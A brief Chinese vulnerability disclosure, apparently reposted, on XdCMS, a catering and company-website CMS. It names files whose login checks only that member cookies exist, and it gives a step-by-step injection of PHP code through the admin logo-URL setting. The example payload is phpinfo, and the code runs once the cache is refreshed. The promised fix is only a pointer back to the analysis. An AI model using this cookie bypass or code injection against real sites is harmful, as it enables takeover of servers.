XdCMS外卖、订餐、企业网站系统多处漏洞及修复

漏洞文件: System/modeules/member/login.php if(empty($_COOKIE['member_user'])||empty($_COOKIE['member_userid'])) //只判断Cookie是否存在漏洞文件:www.2cto.com system/libs/base.class.php if( empty($_COOKIE['member_user'])|| empty($_COOKIE['member_userid'])){ //只判断Cookie Sysplugins\smarty_internal_compile_include.php 参数$include_file 存在问题在后台2次利用执行代码 1.访问//index.php?m=xdcms&c=setting 2.在网站LOGO地址：填写]');?><?php phpinfo()?> <?php $_config=array ( 'logourl' => '] 3.点击后台首页-->>常用操作-->>更新全站缓存刷新即可执行刚才添加的php代码作者王大随性修复：见上述分析

查看更多关于XdCMS外卖、订餐、企业网站系统多处漏洞及修复的详细内容...

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did13944

更新时间：2022-09-13 阅读：42次